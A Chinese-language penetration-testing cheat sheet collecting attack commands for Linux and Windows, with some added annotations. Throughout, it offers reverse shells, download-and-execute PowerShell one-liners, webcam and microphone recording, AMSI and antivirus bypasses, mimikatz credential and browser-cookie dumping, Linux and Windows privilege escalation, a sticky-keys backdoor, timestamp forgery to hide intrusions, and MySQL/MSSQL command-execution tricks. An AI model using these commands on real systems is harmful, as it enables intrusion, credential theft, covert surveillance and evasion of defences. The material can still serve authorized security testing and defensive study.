Commands 搜集(持续更新)

Linux

Linux反弹shell后,方便的交互(把哑 shell 升级为 pty,才能用 su/sudo/vim 等需要终端的命令):

python -c 'import pty; pty.spawn("/bin/bash")'     # 只有 python3 的系统用 python3 -c '...'

无python时:

expect -c 'spawn bash;interact'
(或) script -qc /bin/bash /dev/null

无wget nc等下载工具时下载文件

exec 5<>/dev/tcp/sec-lab.org/80 && printf 'GET /c.pl HTTP/1.0\r\nHost: sec-lab.org\r\n\r\n' >&5 && cat <&5 > c.pl
# 说明:/dev/tcp 是 bash 内置特性,sh/dash 没有;原文的弯引号 “ ” 需改为直引号,且 HTTP 请求必须以空行(\r\n\r\n)结束。
# c.pl 里会带上 HTTP 响应头,需删掉第一个空行及其之前的内容,例如: sed -i '1,/^\r*$/d' c.pl

修改上传文件时间戳(掩盖入侵痕迹)

touch -r 参考文件 目标文件   # 把参考文件的 atime/mtime 复制到目标文件
# 注意:ctime 无法用 touch 设置,会被更新为当前时间;取证时 mtime 明显早于 ctime(stat 文件 可见)就是典型的时间戳篡改特征
利用BASH提权

这个要求管理员先以该(已被控制的)普通用户身份登录,再用不带 - 的 su 切换到 root:su 不带 - 时会保留当前环境变量,root 的 bash 在显示提示符前执行 PROMPT_COMMAND,于是以 root 身份添加一个 uid=0 的用户。su - / su -l 会重置环境,sudo 默认 env_reset 也会清掉该变量,这两种情况下不生效。

$PROMPT_COMMAND 这个变量保存了在主提示符 $PS1 显示之前需要执行的命令
导入(写入被控用户的 ~/.bashrc 等启动文件,使其在管理员以该用户登录时被 export;注意原文 useradd 建的是 hack、chpasswd 改的却是 hacker,两者不一致会导致改密失败,下面已统一为 hack):

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hack:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

lsof 命令

lsof 1.txt           显示打开文件 1.txt 的进程
lsof -i :22          查看 22 端口现在被哪个程序使用
lsof -c nsd          显示命令名以 nsd 开头的进程打开的文件
lsof -g pgid         按进程组 ID(PGID)筛选(注意:-g 是进程组,不是用户组 gid)
lsof +d /usr/local/  显示该目录下被进程打开的文件(不递归子目录)
lsof +D /usr/local/  同上,但递归搜索子目录,耗时较长
lsof -d 4            显示使用 fd 为 4 的进程
lsof -i [i]          按 [46][协议][@主机][:端口] 条件显示网络连接,如 lsof -i tcp@127.0.0.1:80

SSH端口转发

下面文章详细描述了3种方式转发(本地转发 ssh -L、远程转发 ssh -R、动态 SOCKS 代理 ssh -D;远程转发要监听非回环地址需要服务端 sshd 开启 GatewayPorts yes)

http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

图片马

exiftool "-comment<=raj.php" 1.png    # <= 表示把 raj.php 的文件内容写入 Comment 字段(原文弯引号需改为直引号);这只是把 PHP 代码塞进图片,能否执行取决于服务端是否以 PHP 解析该文件(文件包含/解析漏洞)

Windows
Powershell 相关

注意:以下命令都通过 IEX 直接执行从第三方仓库实时下载的脚本,内容随时可能变化且没有完整性校验;实际使用前应先审阅脚本,并把 URL 中的 master 固定为具体 commit hash 或自行托管审核过的副本。-nop -exec bypass 只绕过执行策略,不绕过 AMSI/Defender。

获取无线密码:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "

提权加账号(Invoke-MS16-032,仅对未安装 2016 年 3 月 MS16-032 补丁的 Windows 有效)

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

下载执行:

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg','C:\Users\Public\test.jpg') & start C:\Users\Public\test.jpg
(这是在 cmd.exe 里执行的一行:& 是 cmd 的命令分隔符,powershell 部分到 & 为止;在 PowerShell 里要改用 ;。原文路径中单双反斜杠混用,已统一)

摄像头录像:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"

录音:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1');Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"
MSHTA
VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRAT
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
Bypass AMSI:
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
use:

powershell.exe -ExecutionPolicy Bypass -noprofile -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);iex(New-Object Net.WebClient).DownloadString('http://192.168.230.1/msfpayload.ps1')"
注:原文里的 '' 双单引号是从别处嵌套引号里复制来的,直接执行会报错,已改为单引号并用 -c "..." 包裹。这段 amsiInitFailed 写法早已被 AMSI/Defender 签名识别,原样使用通常会被直接拦截;-ExecutionPolicy Bypass 只绕过执行策略,不影响 AMSI 扫描。
Bypass AV(利用 sqlite3.exe 的 load_extension 加载任意 DLL:1.txt 是改名后的 DLL,'EP' 是它导出的入口函数名;第二条从远程 SMB 共享加载。要求该 sqlite3.exe 编译时未禁用扩展加载)
sqlite3.exe -cmd "select load_extension('1.txt','EP')"
sqlite3.exe -cmd "select load_extension('\\192.168.1.101\share\1.txt','EP')"

mimikatz

获取vpn密码(dump SAM 哈希与 LSA secrets;LSA secrets 中可能保存 VPN/服务账号等凭据。需要管理员权限,token::elevate 提升到 SYSTEM)

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

读取chrome cookies / 保存的密码(DPAPI 解密,需在目标用户上下文中运行或拿到其 masterkey)

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
注:USERDA~1 / LOGIND~1 是 "User Data" / "Login Data" 的 8.3 短文件名,用来避开路径中的空格;只有卷启用了 8.3 名称生成时才存在(fsutil 8dot3name query),且目录下有同前缀文件时后缀未必是 ~1,用 dir /x 确认。第二条中的 default\USERDA~1 疑为笔误(Default 目录下没有 User Data)。Chrome 80+ 改用存放在 User Data\Local State 中、经 DPAPI 保护的 AES 密钥加密,需要支持该格式的较新版 mimikatz。

提权常用

// What system are we connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)

hostname

echo %username%

// Get users

net users
net user [username]

// Networking stuff

ipconfig /all

// Printer?

route print
// ARP cache (Windows arp takes lowercase -a)

arp -a

// Active network connections

netstat -ano

// Firewall fun ("netsh firewall" is the legacy XP SP2 syntax; on Vista and later use "netsh advfirewall")

netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all

// Scheduled tasks

schtasks /query /fo LIST /v

// Running processes to started services

tasklist /SVC
net start

// Driver madness

DRIVERQUERY

// WMIC fun (Win 7/8 – XP requires admin)

wmic /?

//Use wmic_info script!

// WMIC: check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search patches for a given patch (replace KB.. with the KB number, e.g. /C:"KB4012212")

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.."

// AlwaysInstallElevated fun (exploitable only when BOTH the HKLM and the HKCU value are 1; then any .msi is installed as SYSTEM)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need
// ("==" in the original dir line is just a cmd argument separator and does nothing; the recursive reg queries can take minutes on a large hive)

dir /s /b *pass* *cred* *vnc* *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

// Service permissions

sc query
sc qc [service_name]

// Accesschk stuff download link

accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv [service_name]

// Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting (record the original "sc qc" output first so binpath/obj can be restored afterwards; sc requires the space after "=")

sc qc [service_name]   (save this output before touching the service)
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name]   (to verify!)
net start [service_name]
// net start will usually report the service as failed (nc is not a real service binary); the callback normally fires before the SCM times it out
CMD

%ProgramData:~0,1%%ProgramData:~9,2% /c echo
(用环境变量子串拼出 "CmD":%ProgramData% 默认为 C:\ProgramData,~0,1 取 "C",~9,2 取 "mD",用于规避对 "cmd" 字样的简单匹配;ProgramData 被改到其他路径时失效)

命令行下载

certutil -urlcache -split -f http://example.com/file file.bin
(下载后 certutil 会在 URL 缓存中留下记录,可用 certutil -urlcache http://example.com/file delete 清除;certutil 联网下载本身是 EDR 的重点监控行为)

命令行下连接VPN(win):

rasdial "VPN Connection" <用户名> <密码>    # 原文含明文账号密码,已替换为占位符;密码会出现在命令行历史和进程列表中

命令行关闭VPN连接(win):

rasphone -h "VPN Connection"

通过pptpsetup(Linux):

pptpsetup --create vpn --server <服务器IP> --username <用户名> --password <密码> --encrypt --start    # 原文含明文账号密码,已替换为占位符;密码会出现在 shell 历史中

注册表运行程序(用来整蛊挺好玩):劫持当前用户下所有文件夹的 "open" 动作,资源管理器每次打开文件夹都会弹出 cmd。该位置(HKCU\Software\Classes\Folder\shell\open\command 加空的 DelegateExecute)也是若干已知 UAC 绕过所利用的键,EDR 一般会监控对它的写入:

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f  

删除命令:

reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

Windows Server 2019开启远程桌面

默认情况下,Windows Server 2019将外部远程桌面访问设置为禁用作为安全措施,我们可以轻松地从PowerShell中启用它

使用PowerShell允许远程桌面

我们可以使用 Set-ItemProperty cmdlet 修改启用或禁用远程桌面的注册表值(需管理员权限):

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

完成后,使用 Enable-NetFirewallRule 配置 Windows 防火墙以允许远程桌面连接:
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
默认情况下,这将允许来自任何来源的连接,建议尽可能配置更具体的防火墙规则(限制来源 IP)。
同时建议保持 NLA(网络级别身份验证)开启:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1

关闭防火墙:

关闭 windows 防火墙需要管理员或 system 权限

netsh advfirewall set allprofiles state off

关闭 windefend(Windows Defender 服务):

net stop windefend
注:在启用了篡改防护(Tamper Protection)的 Windows 10/11 上,此命令即使以管理员身份也会被拒绝(Access is denied);这两个操作都会在事件日志中留下明显记录。

关闭DEP

bcdedit.exe /set {current} nx AlwaysOff    # 需要管理员权限,重启后生效;原文缺少 /set 与 {current} 之间的空格

Bitlocker磁盘加密(manage-bde,需管理员权限;原文缺少 -off/-status 前的空格)

manage-bde -off C:      # 关闭 BitLocker 并开始解密 C:
manage-bde -status C:   # 查看加密/解密状态

端口转发类

反弹shell:

shell: nc -e cmd ip port                   (windows,需要带 -e 的 nc 版本)
shell: bash -i >& /dev/tcp/ip/port 0>&1    (linux,bash 专用,sh/dash 没有 /dev/tcp)

服务器: nc -lvvp port
注:OpenBSD 版 netcat 没有 -e,可改用 nc.traditional/ncat -e,或 mkfifo 方式:rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ip port > /tmp/f

端口转发(lcx):

shell(被控机): lcx -slave 攻击机ip 攻击机监听port 127.0.0.1 3389    # 把本机 3389 转发到攻击机

服务器(攻击机): lcx -listen 攻击机监听port 33891                  # 之后用 mstsc 连接 攻击机:33891

ANTIFW.exe -s #运行程序,将3389转发到80
ANTIFW.exe -l #关闭程序,恢复

cmd探查

信息探测类

systeminfo :查看系统版本信息

netstat -ano : 查看系统开放端口

tasklist /svc : 查看系统进程

ipconfig : 查看ip地址

whoami : 查看当前用户

net user : 查看计算机用户列表

net localgroup : 查看计算机用户组列表

添加用户类

net user mstlab mstlab /add : 添加用户并设置密码

net localgroup administrators mstlab /add : 将用户加入管理组

net user guest /active:yes : 激活guest用户

net user guest mstlab : 更改guest用户的密码

KIll DOG:

Kill Dog:

1.安全狗默认只拦截加管理组,不拦截加用户

法a:利用用户克隆exp:直接克隆administrator的权限
法b:反弹shell读取管理员密码
法c:改注册表替换安全狗的文件,然后重启服务器(regedit /s redegit.reg,/s 为静默导入,redegit.reg 见下文附录;原文的 redegit 是 regedit 的笔误)安全狗关闭

2.安全狗账号防护最严程度:拦截添加用户

法a:激活guest,然后克隆用户
法b:反弹shell读取管理员密码
法c:改注册表,重启服务器,关闭安全狗

redegit.reg脚本内容(IFEO 映像劫持,写 HKLM 需要管理员/SYSTEM 权限):

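Windows Registry Editor Version 5.00

; Image File Execution Options hijack: whenever SafeDogGuardCenter.exe is started, Windows
; launches the "Debugger" value instead (with the original command line appended). Pointing
; it at a non-executable file makes the guard process fail to start at all.
; NOTE: backslashes inside .reg string values must be written as "\\" per the .reg format;
; the single backslashes in the original paste are not reliably imported by regedit.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\\WWW\\l.php"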

开启的3389方法:

1.通用开3389(优化后):

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

2.For Win2003:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

3.For Win2008:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

4.For Every:

cmd开3389 win08 win03 win7 win2012 winxp

win08,三条命令即可(原文中的 \t 被渲染成了制表符,正确的命名空间是 \\root\cimv2\terminalservices):

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

win2012通用;win7前两条即可。权限需要 run as administrator。第二条是开启 NLA(setuserauthenticationrequired 1),第三条允许同一用户多个并发会话(fSingleSessionPerUser=0),按需选用。

查询终端端口 :

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
(or) 终端端口:tasklist /svc 查询 TermService 对应的 PID,再用 netstat -ano 查该 PID 监听的端口
(or) 注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp 中 PortNumber 的值(原文中的 \r、\t 被渲染成了回车/制表符)

数据库提权:

UDF手工提权辅助:

select @@basedir;  #查看mysql安装目录
select @@secure_file_priv;  #MySQL 5.5.53+ 默认限制 into dumpfile 的写入目录,该值非空/NULL 时下面的写文件全部失败
select 'It is dll' into dumpfile 'C:\\phpstu\\MySQL\\lib::';  #利用NTFS ADS创建lib目录(显式写法为 lib::$INDEX_ALLOCATION;原文路径被截断,此处按下文的 C:\phpstu\MySQL 补全)
select 'It is dll' into dumpfile 'C:\\phpstu\\MySQL\\lib\\plugin::';  #利用NTFS ADS创建plugin目录
select 0xUDFcode into dumpfile 'C:\\phpstu\\MySQL\\lib\\plugin\\mstlab.dll';  #导出udfcode,注意修改udfcode;MySQL 字符串里反斜杠是转义符,路径要写成 \\ 或改用 /
create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数;函数名必须与 dll 实际导出的符号一致(常见导出:shell,sys_exec,sys_eval)
select shell('cmd','net user');     #执行cmd命令;注意上一行创建的是 cmdshell、这里调用的是 shell,两处必须对应同一个导出函数名

show variables like '%plugin%'; #查看plugin路径(plugin_dir),dll 必须放在该目录下

小技巧:

1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
2.my.ini中datadir的值是数据存放目录
3.UPDATE mysql.user SET File_priv='Y' WHERE user='目标用户';  flush privileges;  强制加file权限(需已有 mysql 库的 UPDATE 权限;原文缺少库名和 WHERE,会改掉所有账号)

MOF手工提权辅助:

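// nullevt.mof: registers a permanent WMI event subscription whose JScript consumer runs as SYSTEM.
// Three things were stripped from the original paste and are restored here: the '#' of '#pragma',
// the '$EventFilter' / '$Consumer' aliases (the binding at the bottom is invalid without them),
// and a statement separator inside ScriptText.
#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires on every __InstanceModificationEvent of Win32_LocalTime whose Second == 5,
// i.e. once per minute.
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that creates a local account and adds it to Administrators.
// The two statements need a separator; the original paste juxtaposed them, which is a JScript syntax error.
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\");WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")";
};

// Binding: ties the filter to the consumer; both sides must reference the aliases declared above.
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};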

保存为 1.mof
然后mysql执行:select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
注:依赖 wbem\mof 目录的自动编译机制,仅 Windows XP / Server 2003 有效(Vista/2008 起已移除);同样受 secure_file_priv 限制,且 MySQL 服务账号需有权写入 system32。

SA提权辅助:

1.判断扩展存储是否存在:

select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
select count(*) from master.dbo.sysobjects where name='xp_regread'

删除 / 恢复:

exec sp_dropextendedproc 'xp_cmdshell'                          -- 删除 xp_cmdshell(SQL 2000)
exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'             -- 恢复 xp_cmdshell(SQL 2000;原文误写成了 sp_dropextendedproc)
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;   -- SQL 2005 及以后用此开启

2.列目录:

exec master..xp_cmdshell 'ver'
(or) exec master..xp_dirtree 'c:\',1,1
(or) drop table black
create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- 
insert into black exec master..xp_cmdshell 'dir c:\' 
select top 1 mulu from black where id=1
xp_cmdshell被删除时,可以用(5.法a)关闭沙盒模式,然后用(5.法b)的方法提权

3.备份启动项:

alter database [master] set RECOVERY FULL
create table cmd (a image)
backup log [master] to disk = 'c:\cmd1' with init
insert into cmd (a) values (0x(batcode))
backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'
drop table cmd

4.映像劫持

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
-- 粘滞键后门:之后在登录界面(本地或 RDP)连按 5 次 Shift 即得到 SYSTEM 权限的 cmd;需要 SQL Server 服务账号对 HKLM 有写权限。IFEO 下的 sethc.exe/utilman.exe 是各类 EDR 的标准监控项

5.沙盒模式提权:

法a:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\JET\Engines','SandBoxMode','REG_DWORD',0;

关闭沙盒模式

法b:

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user mstlab mstlab /add")');  -- 也可用 c:\windows\system32\ias\dnary.mdb;string 类型用此。T-SQL 的注释是 --,不是 #
开启OpenRowSet:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
注:Microsoft.Jet.OLEDB.4.0 只有 32 位版本,64 位 SQL Server 上不可用;ias\*.mdb 在较新的 Windows 上也未必存在。

6.xp_regwrite操作注册表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','black','REG_SZ','net user test test /add'   -- 原文的 \r 被渲染成了回车;Run 键中的命令在下次用户登录时以该用户身份执行,net user /add 需要该用户是管理员
开启xp_oacreate:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;